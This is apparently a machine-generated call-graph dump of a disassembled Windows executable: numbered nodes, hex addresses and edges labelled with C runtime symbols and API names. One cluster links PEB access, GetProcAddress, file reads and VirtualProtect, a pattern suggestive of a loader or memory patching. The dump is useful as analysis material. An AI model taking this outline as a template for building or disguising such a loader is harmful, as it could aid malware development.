b05677 ___free_lconv_mon 14 API calls 17807->17809 17808->17805 17809->17808 17811 afc88a 14 API calls 17810->17811 17812 afc859 17811->17812 17820 afc82c 17812->17820 17823 b012e7 17815->17823 17817 b01305 __dosmaperr 17818 b012d4 __dosmaperr 14 API calls 17817->17818 17819 afc96c 17818->17819 17819->17804 17821 b056b1 __strnicoll 15 API calls 17820->17821 17822 afc839 17821->17822 17822->17805 17824 b05a5b __dosmaperr 14 API calls 17823->17824 17825 b012ec 17824->17825 17825->17817 17829 af2010 GetModuleHandleA GetModuleFileNameW 17826->17829 17836 b03fda 17829->17836 17831 af2081 17840 af1f00 17831->17840 17834 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17835 af2099 17834->17835 17835->16830 17837 b03fed _Fputc 17836->17837 17849 b0404f 17837->17849 17839 b03fff _Fputc 17839->17831 17891 af1ba0 GetPEB 17840->17891 17842 af1f1f 17892 af1c10 GetProcAddress 17842->17892 17844 af1f39 17845 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17844->17845 17847 af1ffb 17845->17847 17847->17834 17848 af1f31 17848->17844 17905 af1db0 17848->17905 17850 b0407f 17849->17850 17851 b040ac 17850->17851 17852 b0408e 17850->17852 17863 b04083 17850->17863 17854 b040b9 17851->17854 17873 afd580 17851->17873 17853 b01b68 _Fputc 29 API calls 17852->17853 17853->17863 17857 b040f1 17854->17857 17858 b040d3 17854->17858 17855 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17859 b042f4 17855->17859 17861 b04281 17857->17861 17862 b04105 17857->17862 17879 b0f42b 17858->17879 17859->17839 17861->17863 17864 b057c1 _Fputc WideCharToMultiByte 17861->17864 17862->17863 17865 b0419f 17862->17865 17869 b04149 17862->17869 17863->17855 17864->17863 17866 b057c1 _Fputc WideCharToMultiByte 17865->17866 17867 b041b2 17866->17867 17867->17863 17870 b041cb GetLastError 17867->17870 17868 b057c1 _Fputc WideCharToMultiByte 17868->17863 17869->17868 17870->17863 17871 b041da 17870->17871 17871->17863 17872 b057c1 _Fputc WideCharToMultiByte 17871->17872 17872->17871 17874 afd590 17873->17874 17883 b05f48 17874->17883 17880 b0f462 std::_Locinfo::_Locinfo_dtor codecvt 17879->17880 17881 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17880->17881 17882 b0f538 17881->17882 17882->17863 17884 afd5ad 17883->17884 17885 b05f5f 17883->17885 17887 b05f79 17884->17887 17885->17884 17886 b0a015 __Getctype 39 API calls 17885->17886 17886->17884 17888 afd5ba 17887->17888 17889 b05f90 17887->17889 17888->17854 17889->17888 17890 b07202 __strnicoll 39 API calls 17889->17890 17890->17888 17891->17842 17893 af1c59 CreateFileA 17892->17893 17894 af1caa 17893->17894 17895 af1cb3 GetFileSize 17893->17895 17898 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17894->17898 17896 af1cd9 CloseHandle 17895->17896 17897 af1cf1 17895->17897 17896->17894 17900 af1cfc ReadFile 17897->17900 17899 af1d98 17898->17899 17899->17848 17901 af1d3c 17900->17901 17902 af1d70 CloseHandle 17900->17902 17903 af1d4d 17901->17903 17904 af1d58 CloseHandle 17901->17904 17902->17894 17903->17904 17904->17894 17917 af1000 17905->17917 17908 af1000 106 API calls 17909 af1e5b GetProcAddress 17908->17909 17910 af1e84 VirtualProtect 17909->17910 17912 af1edc 17910->17912 17913 af1ed1 17910->17913 17915 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17912->17915 17928 af1bd0 17913->17928 17916 af1eeb 17915->17916 17916->17844 17918 af1056 17917->17918 17932 af1440 17918->17932 17920 af13c7 17961 af1b80 17920->17961 17925 af1167 ___std_exception_copy 17925->17920 17927 b02a1e std::locale::_Locimp::~_Locimp 14 API calls 17925->17927 17936 af1490 17925->17936 17939 af14c0 17925->17939 17955 af1af0 17925->17955 17927->17925 17929 af1bfa 17928->17929 17930 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17929->17930 17931 af1c04 17930->17931 17931->17912 17933 af1466 std::ios_base::_Init 17932->17933 17934 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17933->17934 17935 af1487 17934->17935 17935->17925 17964 af23d0 17936->17964 17938 af14aa 17938->17925 17941 af1510 _strlen 17939->17941 18011 af3050 17941->18011 17942 af15b1 17948 af15c4 17942->17948 18015 af3180 17942->18015 18037 af35b0 17948->18037 17956 af1b20 _Fputc 17955->17956 18207 af20f0 17956->18207 17959 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17960 af1b4e 17959->17960 17960->17925 18226 af21f0 17961->18226 17965 af2418 17964->17965 17967 af23ff 17964->17967 17968 af24b0 17965->17968 17967->17938 17969 af24f3 std::ios_base::_Init 17968->17969 17987 af2760 17969->17987 17972 af254a 17991 af27e0 17972->17991 17988 af277b std::ios_base::_Init 17987->17988 17989 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 17988->17989 17990 af2538 17989->17990 17990->17972 18002 af27c0 17990->18002 17992 af27f7 17991->17992 17993 af2760 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17992->17993 17994 af2561 17993->17994 17995 af2860 17994->17995 17996 af2ab0 30 API calls 17995->17996 17997 af287a 17996->17997 18003 af7934 std::ios_base::_Init 30 API calls 18002->18003 18004 af27d2 18003->18004 18012 af3099 18011->18012 18014 af30b1 18012->18014 18045 af36e0 18012->18045 18014->17942 18053 af74a4 18015->18053 18019 af31d7 18031 af3215 18019->18031 18074 af3a80 18019->18074 18067 af74d5 18031->18067 18038 af35d5 18037->18038 18188 af4da0 18038->18188 18041 af3600 18042 af3614 18041->18042 18046 af3722 18045->18046 18047 af37d5 18046->18047 18048 af3050 39 API calls 18046->18048 18047->18014 18050 af373d 18048->18050 18049 af3600 39 API calls 18049->18047 18051 af35b0 39 API calls 18050->18051 18052 af3750 18050->18052 18051->18052 18052->18049 18054 af74ba 18053->18054 18055 af74b3 18053->18055 18057 af31c2 18054->18057 18106 af9c18 EnterCriticalSection 18054->18106 18101 b01cff 18055->18101 18059 af3950 18057->18059 18060 af39ae 18059->18060 18061 af3972 18059->18061 18063 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18060->18063 18062 af74a4 std::_Lockit::_Lockit 7 API calls 18061->18062 18064 af3983 18062->18064 18065 af39c0 18063->18065 18066 af74d5 std::_Lockit::~_Lockit 2 API calls 18064->18066 18065->18019 18066->18060 18075 af3232 18074->18075 18102 b065cb std::_Lockit::_Lockit 5 API calls 18101->18102 18103 b01d04 18102->18103 18104 b01cd1 std::_Lockit::_Lockit EnterCriticalSection 18103->18104 18105 b01d0b 18104->18105 18105->18057 18106->18057 18191 af4df0 18188->18191 18192 af4edc 18191->18192 18193 af4e34 18191->18193 18194 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 18192->18194 18196 afa41c Concurrency::cancel_current_task RaiseException 18193->18196 18197 af4e54 18193->18197 18195 af18d9 18194->18195 18195->18041 18196->18197 18198 af4ef0 std::ios_base::_Init 38 API calls 18197->18198 18199 af4eaf 18198->18199 18200 af4f30 std::ios_base::_Init 30 API calls 18199->18200 18201 af4ec4 18200->18201 18208 af2119 18207->18208 18211 afd348 18208->18211 18210 af1b3b 18210->17959 18212 afd35c _Fputc 18211->18212 18213 afd37e 18212->18213 18215 afd3a5 18212->18215 18214 b01b68 _Fputc 29 API calls 18213->18214 18217 afd399 _Fputc 18214->18217 18218 afeafd 18215->18218 18217->18210 18219 afeb09 ___scrt_is_nonwritable_in_current_image 18218->18219 18220 afd0ff _Ungetc EnterCriticalSection 18219->18220 18221 afeb17 18220->18221 18222 afe4d2 70 API calls 18221->18222 18223 afeb24 18222->18223 18224 afeb4c LeaveCriticalSection 18223->18224 18225 afeb35 18224->18225 18225->18217 18227 af2204 std::ios_base::_Init 18226->18227 18228 af13d2 18227->18228 18230 af22e0 18227->18230 18228->17908 18233 af2310 18230->18233 18232 af2304 18232->18228 18234 af233b codecvt 18233->18234 18235 af2329 18233->18235 18234->18232 18236 af2360 std::ios_base::_Init 29 API calls 18235->18236 18236->18234 18239 afd07d 18237->18239 18240 afd08f ___scrt_uninitialize_crt 18237->18240 18238 afd08b 18238->16871 18239->18238 18242 b0213a 18239->18242 18240->16871 18245 b02265 18242->18245 18248 b0233e 18245->18248 18249 b0234a ___scrt_is_nonwritable_in_current_image 18248->18249 18256 b01cd1 EnterCriticalSection 18249->18256 18251 b023c0 18265 b023de 18251->18265 18253 b02354 ___scrt_uninitialize_crt 18253->18251 18257 b022b2 18253->18257 18256->18253 18258 b022be ___scrt_is_nonwritable_in_current_image 18257->18258 18268 afd0ff EnterCriticalSection 18258->18268 18260 b022c8 ___scrt_uninitialize_crt 18261 b02301 18260->18261 18269 b02143 18260->18269 18280 b02332 18261->18280 18381 b01ce8 LeaveCriticalSection 18265->18381 18267 b02141 18267->18238 18268->18260 18381->18267 20743 af8b10 20744 af8b4e 20743->20744 20745 af8b19 20743->20745 20745->20744 20748 b020e7 20745->20748 20747 af8b41 20749 b020f9 20748->20749 20753 b02102 ___scrt_uninitialize_crt 20748->20753 20750 b02265 ___scrt_uninitialize_crt 68 API calls 20749->20750 20751 b020ff 20750->20751 20751->20747 20752 b02111 20752->20747 20753->20752 20756 b023ea 20753->20756 20757 b023f6 ___scrt_is_nonwritable_in_current_image 20756->20757 20764 afd0ff EnterCriticalSection 20757->20764 20759 b02404 20760 b02143 ___scrt_uninitialize_crt 68 API calls 20759->20760 20761 b02415 20760->20761 20765 b0243e 20761->20765 20764->20759 20768 afd113 LeaveCriticalSection 20765->20768 20767 b02138 20767->20747 20768->20767 19760 af8660 19761 af867b 19760->19761 19763 af868d 19761->19763 19764 af8051 19761->19764 19767 b03a4e 19764->19767 19768 b03a5a ___scrt_is_nonwritable_in_current_image 19767->19768 19769 b03a61 19768->19769 19770 b03a78 19768->19770 19771 b012d4 __dosmaperr 14 API calls 19769->19771 19780 afd0ff EnterCriticalSection 19770->19780 19773 b03a66 19771->19773 19775 b019bf __strnicoll 29 API calls 19773->19775 19774 b03a87 19781 b03acc 19774->19781 19778 af8063 19775->19778 19777 b03a95 19795 b03ac4 19777->19795 19778->19763 19780->19774 19782 b03ae2 19781->19782 19783 b03b6c _Ungetc 19781->19783 19782->19783 19785 b03b10 19782->19785 19798 b0f3cf 19782->19798 19783->19777 19785->19783 19786 b08e04 _Ungetc 29 API calls 19785->19786 19787 b03b22 19786->19787 19788 b03b45 19787->19788 19789 b08e04 _Ungetc 29 API calls 19787->19789 19788->19783 19803 b03b82 19788->19803 19790 b03b2e 19789->19790 19790->19788 19792 b08e04 _Ungetc 29 API calls 19790->19792 19793 b03b3a 19792->19793 19794 b08e04 _Ungetc 29 API calls 19793->19794 19794->19788 19830 afd113 LeaveCriticalSection 19795->19830 19797 b03aca 19797->19778 19799 b069b4 _unexpected 14 API calls 19798->19799 19800 b0f3ec 19799->19800 19801 b05677 ___free_lconv_mon 14 API calls 19800->19801 19802 b0f3f6 19801->19802 19802->19785 19804 b08e04 _Ungetc 29 API calls 19803->19804 19805 b03ba5 19804->19805 19806 b08e04 _Ungetc 29 API calls 19805->19806 19813 b03bce 19805->19813 19807 b03bb3 19806->19807 19810 b08e04 _Ungetc 29 API calls 19807->19810 19807->19813 19809 b03c08 19814 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 19809->19814 19811 b03bc1 19810->19811 19812 b08e04 _Ungetc 29 API calls 19811->19812 19812->19813 19813->19809 19816 b08af6 19813->19816 19815 b03c86 19814->19815 19815->19783 19817 b08b09 _Fputc 19816->19817 19820 b08b30 19817->19820 19819 b08b1e _Fputc 19819->19809 19821 b08b45 19820->19821 19822 b08b86 19821->19822 19823 afd580 _Fputc 39 API calls 19821->19823 19825 b08b72 std::invalid_argument::invalid_argument 19821->19825 19826 b08b49 std::invalid_argument::invalid_argument _Fputc 19821->19826 19822->19825 19822->19826 19827 b057c1 _Fputc WideCharToMultiByte 19822->19827 19823->19822 19824 b01b68 _Fputc 29 API calls 19824->19826 19825->19824 19825->19826 19826->19819 19828 b08c41 19827->19828 19828->19826 19829 b08c57 GetLastError 19828->19829 19829->19825 19829->19826 19830->19797 20844 af8760 20845 af876c __EH_prolog3_GS 20844->20845 20848 af87be 20845->20848 20849 af87d8 20845->20849 20852 af8786 20845->20852 20860 af800d 20848->20860 20863 b0244a 20849->20863 20887 af9d7e 20852->20887 20854 af6800 std::ios_base::_Init 29 API calls 20854->20852 20855 af87f7 20856 af8894 20855->20856 20857 af88ce 20855->20857 20859 b0244a 45 API calls 20855->20859 20883 af7b4b 20855->20883 20856->20854 20857->20856 20890 b038e7 20857->20890 20859->20855 20903 b02605 20860->20903 20864 b02456 ___scrt_is_nonwritable_in_current_image 20863->20864 20865 b02460 20864->20865 20866 b02478 20864->20866 20867 b012d4 __dosmaperr 14 API calls 20865->20867 21166 afd0ff EnterCriticalSection 20866->21166 20869 b02465 20867->20869 20871 b019bf __strnicoll 29 API calls 20869->20871 20870 b02483 20872 b08e04 _Ungetc 29 API calls 20870->20872 20875 b0249b 20870->20875 20882 b02470 20871->20882 20872->20875 20873 b02503 20877 b012d4 __dosmaperr 14 API calls 20873->20877 20874 b0252b 21167 b02563 20874->21167 20875->20873 20875->20874 20879 b02508 20877->20879 20878 b02531 21177 b0255b 20878->21177 20881 b019bf __strnicoll 29 API calls 20879->20881 20881->20882 20882->20855 20884 af7b7f 20883->20884 20886 af7b5b 20883->20886 21181 af8fef 20884->21181 20886->20855 20888 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 20887->20888 20889 af9d88 20888->20889 20889->20889 20891 b038f3 ___scrt_is_nonwritable_in_current_image 20890->20891 20892 b038fa 20891->20892 20893 b0390f 20891->20893 20894 b012d4 __dosmaperr 14 API calls 20892->20894 21192 afd0ff EnterCriticalSection 20893->21192 20896 b038ff 20894->20896 20898 b019bf __strnicoll 29 API calls 20896->20898 20897 b03919 21193 b0395a 20897->21193 20900 b0390a 20898->20900 20900->20857 20904 b02611 ___scrt_is_nonwritable_in_current_image 20903->20904 20905 b02618 20904->20905 20906 b0262f 20904->20906 20907 b012d4 __dosmaperr 14 API calls 20905->20907 20916 afd0ff EnterCriticalSection 20906->20916 20909 b0261d 20907->20909 20911 b019bf __strnicoll 29 API calls 20909->20911 20910 b0263b 20917 b0267c 20910->20917 20913 af8018 20911->20913 20913->20852 20916->20910 20918 b02699 20917->20918 20919 b026ff 20917->20919 20920 b08e04 _Ungetc 29 API calls 20918->20920 20921 b027c6 20919->20921 20923 b08e04 _Ungetc 29 API calls 20919->20923 20922 b0269f 20920->20922 20953 b02646 20921->20953 20972 b0de3e 20921->20972 20926 b08e04 _Ungetc 29 API calls 20922->20926 20942 b026c2 20922->20942 20924 b02714 20923->20924 20927 b08e04 _Ungetc 29 API calls 20924->20927 20945 b02737 20924->20945 20929 b026ab 20926->20929 20930 b02720 20927->20930 20928 b0274e 20932 b0259f 43 API calls 20928->20932 20933 b08e04 _Ungetc 29 API calls 20929->20933 20929->20942 20937 b08e04 _Ungetc 29 API calls 20930->20937 20930->20945 20931 b026dd 20931->20953 20957 b0259f 20931->20957 20935 b02757 20932->20935 20936 b026b7 20933->20936 20940 afd27f __Getctype 39 API calls 20935->20940 20935->20953 20938 b08e04 _Ungetc 29 API calls 20936->20938 20939 b0272c 20937->20939 20938->20942 20943 b08e04 _Ungetc 29 API calls 20939->20943 20941 b0276f 20940->20941 20944 b02799 20941->20944 20946 b0259f 43 API calls 20941->20946 20942->20919 20942->20931 20943->20945 20968 b08c9a 20944->20968 20945->20921 20945->20928 20948 b02780 20946->20948 20948->20944 20950 b02786 20948->20950 20949 b027ad 20952 b012d4 __dosmaperr 14 API calls 20949->20952 20949->20953 20951 b038e7 31 API calls 20950->20951 20951->20953 20952->20953 20954 b02674 20953->20954 21165 afd113 LeaveCriticalSection 20954->21165 20956 b0267a 20956->20913 20958 b02563 20957->20958 20959 b02584 20958->20959 20960 b0256f 20958->20960 20961 b02593 20959->20961 20993 b0de33 20959->20993 20962 b012d4 __dosmaperr 14 API calls 20960->20962 20961->20931 20963 b02574 20962->20963 20965 b019bf __strnicoll 29 API calls 20963->20965 20967 b0257f 20965->20967 20967->20931 20969 b08cad _Fputc 20968->20969 21146 b08cd1 20969->21146 20971 b08cbf _Fputc 20971->20949 20973 b0dfd8 20972->20973 20974 b0dfe7 20973->20974 20978 b0dffc 20973->20978 20975 b012d4 __dosmaperr 14 API calls 20974->20975 20976 b0dfec 20975->20976 20977 b019bf __strnicoll 29 API calls 20976->20977 20987 b0dff7 20977->20987 20979 b0e05a 20978->20979 20980 b0f3cf _Ungetc 14 API calls 20978->20980 20978->20987 20981 b08e04 _Ungetc 29 API calls 20979->20981 20980->20979 20982 b0e08a 20981->20982 20983 b12d43 43 API calls 20982->20983 20984 b0e092 20983->20984 20985 b08e04 _Ungetc 29 API calls 20984->20985 20984->20987 20986 b0e0cc 20985->20986 20986->20987 20988 b08e04 _Ungetc 29 API calls 20986->20988 20987->20953 20989 b0e0da 20988->20989 20989->20987 20990 b08e04 _Ungetc 29 API calls 20989->20990 20991 b0e0e8 20990->20991 20992 b08e04 _Ungetc 29 API calls 20991->20992 20992->20987 20994 b0de49 20993->20994 20995 b0de56 20994->20995 20998 b0de6e 20994->20998 20996 b012d4 __dosmaperr 14 API calls 20995->20996 20997 b0de5b 20996->20997 20999 b019bf __strnicoll 29 API calls 20997->20999 21000 b0decd 20998->21000 21001 b0f3cf _Ungetc 14 API calls 20998->21001 21008 b02590 20998->21008 20999->21008 21002 b08e04 _Ungetc 29 API calls 21000->21002 21001->21000 21003 b0dee6 21002->21003 21014 b12d43 21003->21014 21006 b08e04 _Ungetc 29 API calls 21007 b0df1f 21006->21007 21007->21008 21009 b08e04 _Ungetc 29 API calls 21007->21009 21008->20931 21010 b0df2d 21009->21010 21010->21008 21011 b08e04 _Ungetc 29 API calls 21010->21011 21012 b0df3b 21011->21012 21013 b08e04 _Ungetc 29 API calls 21012->21013 21013->21008 21015 b12d4f ___scrt_is_nonwritable_in_current_image 21014->21015 21016 b12d57 21015->21016 21019 b12d72 21015->21019 21017 b012e7 __dosmaperr 14 API calls 21016->21017 21018 b12d5c 21017->21018 21021 b012d4 __dosmaperr 14 API calls 21018->21021 21020 b12d89 21019->21020 21022 b12dc4 21019->21022 21023 b012e7 __dosmaperr 14 API calls 21020->21023 21028 b0deee 21021->21028 21024 b12de2 21022->21024 21025 b12dcd 21022->21025 21026 b12d8e 21023->21026 21044 b0cfd8 EnterCriticalSection 21024->21044 21027 b012e7 __dosmaperr 14 API calls 21025->21027 21030 b012d4 __dosmaperr 14 API calls 21026->21030 21031 b12dd2 21027->21031 21028->21006 21028->21008 21033 b12d96 21030->21033 21034 b012d4 __dosmaperr 14 API calls 21031->21034 21032 b12de8 21035 b12e07 21032->21035 21036 b12e1c 21032->21036 21038 b019bf __strnicoll 29 API calls 21033->21038 21034->21033 21037 b012d4 __dosmaperr 14 API calls 21035->21037 21045 b12e5c 21036->21045 21041 b12e0c 21037->21041 21038->21028 21040 b12e17 21108 b12e54 21040->21108 21042 b012e7 __dosmaperr 14 API calls 21041->21042 21042->21040 21044->21032 21046 b12e86 21045->21046 21047 b12e6e 21045->21047 21048 b131c8 21046->21048 21054 b12ec9 21046->21054 21049 b012e7 __dosmaperr 14 API calls 21047->21049 21051 b012e7 __dosmaperr 14 API calls 21048->21051 21050 b12e73 21049->21050 21052 b012d4 __dosmaperr 14 API calls 21050->21052 21053 b131cd 21051->21053 21059 b12e7b 21052->21059 21055 b012d4 __dosmaperr 14 API calls 21053->21055 21056 b12ed4 21054->21056 21054->21059 21063 b12f04 21054->21063 21057 b12ee1 21055->21057 21058 b012e7 __dosmaperr 14 API calls 21056->21058 21061 b019bf __strnicoll 29 API calls 21057->21061 21060 b12ed9 21058->21060 21059->21040 21062 b012d4 __dosmaperr 14 API calls 21060->21062 21061->21059 21062->21057 21064 b12f1d 21063->21064 21065 b12f58 21063->21065 21066 b12f2a 21063->21066 21064->21066 21072 b12f46 21064->21072 21069 b056b1 __strnicoll 15 API calls 21065->21069 21067 b012e7 __dosmaperr 14 API calls 21066->21067 21068 b12f2f 21067->21068 21070 b012d4 __dosmaperr 14 API calls 21068->21070 21073 b12f69 21069->21073 21075 b12f36 21070->21075 21111 b1017f 21072->21111 21074 b05677 ___free_lconv_mon 14 API calls 21073->21074 21077 b12f72 21074->21077 21078 b019bf __strnicoll 29 API calls 21075->21078 21076 b130a4 21079 b13118 21076->21079 21083 b130bd GetConsoleMode 21076->21083 21080 b05677 ___free_lconv_mon 14 API calls 21077->21080 21082 b12f41 21078->21082 21081 b1311c ReadFile 21079->21081 21084 b12f79 21080->21084 21085 b13190 GetLastError 21081->21085 21086 b13134 21081->21086 21094 b05677 ___free_lconv_mon 14 API calls 21082->21094 21083->21079 21087 b130ce 21083->21087 21088 b12f83 21084->21088 21089 b12f9e 21084->21089 21090 b130f4 21085->21090 21091 b1319d 21085->21091 21086->21085 21092 b1310d 21086->21092 21087->21081 21093 b130d4 ReadConsoleW 21087->21093 21095 b012d4 __dosmaperr 14 API calls 21088->21095 21097 b0c0d2 31 API calls 21089->21097 21090->21082 21101 b012fa __dosmaperr 14 API calls 21090->21101 21096 b012d4 __dosmaperr 14 API calls 21091->21096 21092->21082 21104 b13170 21092->21104 21105 b13159 21092->21105 21093->21092 21098 b130ee GetLastError 21093->21098 21094->21059 21099 b12f88 21095->21099 21100 b131a2 21096->21100 21097->21072 21098->21090 21102 b012e7 __dosmaperr 14 API calls 21099->21102 21103 b012e7 __dosmaperr 14 API calls 21100->21103 21101->21082 21102->21082 21103->21082 21104->21082 21133 b13509 21104->21133 21120 b13265 21105->21120 21145 b0cffb LeaveCriticalSection 21108->21145 21110 b12e5a 21110->21028 21112 b10199 21111->21112 21113 b1018c 21111->21113 21115 b101a5 21112->21115 21116 b012d4 __dosmaperr 14 API calls 21112->21116 21114 b012d4 __dosmaperr 14 API calls 21113->21114 21117 b10191 21114->21117 21115->21076 21118 b101c6 21116->21118 21117->21076 21119 b019bf __strnicoll 29 API calls 21118->21119 21119->21117 21139 b133bc 21120->21139 21123 b056ff __strnicoll MultiByteToWideChar 21124 b13379 21123->21124 21127 b13382 GetLastError 21124->21127 21131 b132ad 21124->21131 21125 b13307 21129 b132c1 21125->21129 21132 b0c0d2 31 API calls 21125->21132 21126 b132f7 21128 b012d4 __dosmaperr 14 API calls 21126->21128 21130 b012fa __dosmaperr 14 API calls 21127->21130 21128->21131 21129->21123 21130->21131 21131->21082 21132->21129 21134 b13543 21133->21134 21135 b135d9 ReadFile 21134->21135 21136 b135d4 21134->21136 21135->21136 21137 b135f6 21135->21137 21136->21082 21137->21136 21138 b0c0d2 31 API calls 21137->21138 21138->21136 21140 b133f0 21139->21140 21141 b13461 ReadFile 21140->21141 21142 b1327c 21140->21142 21141->21142 21143 b1347a 21141->21143 21142->21125 21142->21126 21142->21129 21142->21131 21143->21142 21144 b0c0d2 31 API calls 21143->21144 21144->21142 21145->21110 21147 b08ce5 21146->21147 21156 b08cf5 21146->21156 21148 b08d1a 21147->21148 21149 afd580 _Fputc 39 API calls 21147->21149 21147->21156 21150 b08d2b 21148->21150 21151 b08d4e 21148->21151 21149->21148 21158 b11cc2 21150->21158 21153 b08d76 21151->21153 21154 b08dca 21151->21154 21151->21156 21153->21156 21157 b056ff __strnicoll MultiByteToWideChar 21153->21157 21155 b056ff __strnicoll MultiByteToWideChar 21154->21155 21155->21156 21156->20971 21157->21156 21161 b13e63 21158->21161 21163 b13e91 _Fputc 21161->21163 21162 af7191 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 21164 b11cdd 21162->21164 21163->21162 21164->21156 21165->20956 21166->20870 21168 b02584 21167->21168 21169 b0256f 21167->21169 21170 b02593 21168->21170 21173 b0de33 43 API calls 21168->21173 21171 b012d4 __dosmaperr 14 API calls 21169->21171 21170->20878 21172 b02574 21171->21172 21174 b019bf __strnicoll 29 API calls 21172->21174 21175 b02590 21173->21175 21176 b0257f 21174->21176 21175->20878 21176->20878 21180 afd113 LeaveCriticalSection 21177->21180 21179 b02561 21179->20882 21180->21179 21182 af90a3 21181->21182 21183 af9013 21181->21183 21185 af5770 std::ios_base::_Init 30 API calls 21182->21185 21184 af5810 std::ios_base::_Init 5 API calls 21183->21184 21186 af9025 21184->21186 21187 af90a8 21185->21187 21188 af2ae0 std::ios_base::_Init 30 API calls 21186->21188 21189 af9030 codecvt 21188->21189 21190 af9071 codecvt 21189->21190 21191 af2310 std::ios_base::_Init 29 API calls 21189->21191 21190->20886 21191->21190 21192->20897 21194 b03972 21193->21194 21196 b039e2 21193->21196 21195 b08e04 _Ungetc 29 API calls 21194->21195 21199 b03978 21195->21199 21197 b0f3cf _Ungetc 14 API calls 21196->21197 21198 b03927 21196->21198 21197->21198 21204 b03952 21198->21204 21199->21196 21200 b039ca 21199->21200 21201 b012d4 __dosmaperr 14 API calls 21200->21201 21202 b039cf 21201->21202 21203 b019bf __strnicoll 29 API calls 21202->21203 21203->21198 21207 afd113 LeaveCriticalSection 21204->21207 21206 b03958 21206->20900 21207->21206 16666 afa24d 16675 af99e0 GetModuleHandleW 16666->16675 16669 afa28b 16680 aff14f 16669->16680 16670 afa259 16673 afa264 16670->16673 16677 aff174 16670->16677 16676 af99ec 16675->16676 16676->16669 16676->16670 16683 aff284 16677->16683 16681 aff284 CallUnexpected 21 API calls 16680->16681 16682 afa293 16681->16682 16684 aff2c3 16683->16684 16685 aff2b1 16683->16685 16701 aff41e 16684->16701 16687 af99e0 CallUnexpected GetModuleHandleW 16685->16687 16688 aff2b6 16687->16688 16688->16684 16695 aff1b8 GetModuleHandleExW 16688->16695 16690 aff17f 16690->16673 16696 aff218 16695->16696 16697 aff1f7 GetProcAddress 16695->16697 16698 aff21e FreeLibrary 16696->16698 16699 aff227 16696->16699 16697->16696 16700 aff20b 16697->16700 16698->16699 16699->16684 16700->16696 16702 aff42a ___scrt_is_nonwritable_in_current_image 16701->16702 16716 b01cd1 EnterCriticalSection 16702->16716 16704 aff434 16717 aff31b 16704->16717 16706 aff441 16721 aff45f 16706->16721 16709 aff253 16778 aff23a 16709->16778 16711 aff25d 16712 aff271 16711->16712 16713 aff261 GetCurrentProcess TerminateProcess 16711->16713 16714 aff1b8 CallUnexpected 3 API calls 16712->16714 16713->16712 16715 aff279 ExitProcess 16714->16715 16716->16704 16718 aff327 ___scrt_is_nonwritable_in_current_image CallUnexpected 16717->16718 16720 aff38b CallUnexpected 16718->16720 16724 b00fee 16718->16724 16720->16706 16777 b01ce8 LeaveCriticalSection 16721->16777 16723 aff2fa 16723->16690 16723->16709 16725 b00ffa __EH_prolog3 16724->16725 16728 b01279 16725->16728 16727 b01021 std::ios_base::_Init 16727->16720 16729 b01285 ___scrt_is_nonwritable_in_current_image 16728->16729 16736 b01cd1 EnterCriticalSection 16729->16736 16731 b01293 16737 b01144 16731->16737 16736->16731 16738 b0115b 16737->16738 16739 b01163 16737->16739 16741 b012c8 16738->16741 16739->16738 16744 b05677 16739->16744 16776 b01ce8 LeaveCriticalSection 16741->16776 16743 b012b1 16743->16727 16745 b05682 RtlFreeHeap 16744->16745 16746 b056ac 16744->16746 16745->16746 16747 b05697 GetLastError 16745->16747 16746->16738 16748 b056a4 __dosmaperr 16747->16748 16750 b012d4 16748->16750 16753 b05a5b GetLastError 16750->16753 16752 b012d9 16752->16746 16754 b05a71 16753->16754 16755 b05a77 16753->16755 16756 b06334 _unexpected 6 API calls 16754->16756 16757 b06373 _unexpected 6 API calls 16755->16757 16759 b05a7b SetLastError 16755->16759 16756->16755 16758 b05a93 16757->16758 16758->16759 16761 b069b4 _unexpected 12 API calls 16758->16761 16759->16752 16762 b05aa8 16761->16762 16763 b05ab0 16762->16763 16764 b05ac1 16762->16764 16766 b06373 _unexpected 6 API calls 16763->16766 16765 b06373 _unexpected 6 API calls 16764->16765 16767 b05acd 16765->16767 16768 b05abe 16766->16768 16769 b05ad1 16767->16769 16770 b05ae8 16767->16770 16772 b05677 ___free_lconv_mon 12 API calls 16768->16772 16771 b06373 _unexpected 6 API calls 16769->16771 16773 b05c1c _unexpected 12 API calls 16770->16773 16771->16768 16772->16759 16774 b05af3 16773->16774 16775 b05677 ___free_lconv_mon 12 API calls 16774->16775 16775->16759 16776->16743 16777->16723 16781 b08f0a 16778->16781 16780 aff23f CallUnexpected 16780->16711 16782 b08f19 CallUnexpected 16781->16782 16783 b08f26 16782->16783 16785 b06580 16782->16785 16783->16780 16788 b066cd 16785->16788 16789 b066fd 16788->16789 16792 b0659c 16788->16792 16789->16792 16795 b06602 16789->16795 16792->16783 16793 b06717 GetProcAddress 16793->16792 16794 b06727 std::_Lockit::_Lockit 16793->16794 16794->16792 16801 b06613 ___vcrt_FlsFree 16795->16801 16796 b066a9 16796->16792 16796->16793 16797 b06631 LoadLibraryExW 16798 b066b0 16797->16798 16799 b0664c GetLastError 16797->16799 16798->16796 16800 b066c2 FreeLibrary 16798->16800 16799->16801 16800->16796 16801->16796 16801->16797 16802 b0667f LoadLibraryExW 16801->16802 16802->16798 16802->16801 21347 af8950 21348 af8964 21347->21348 21349 af8bb5 69 API calls 21348->21349 21354 af89bf 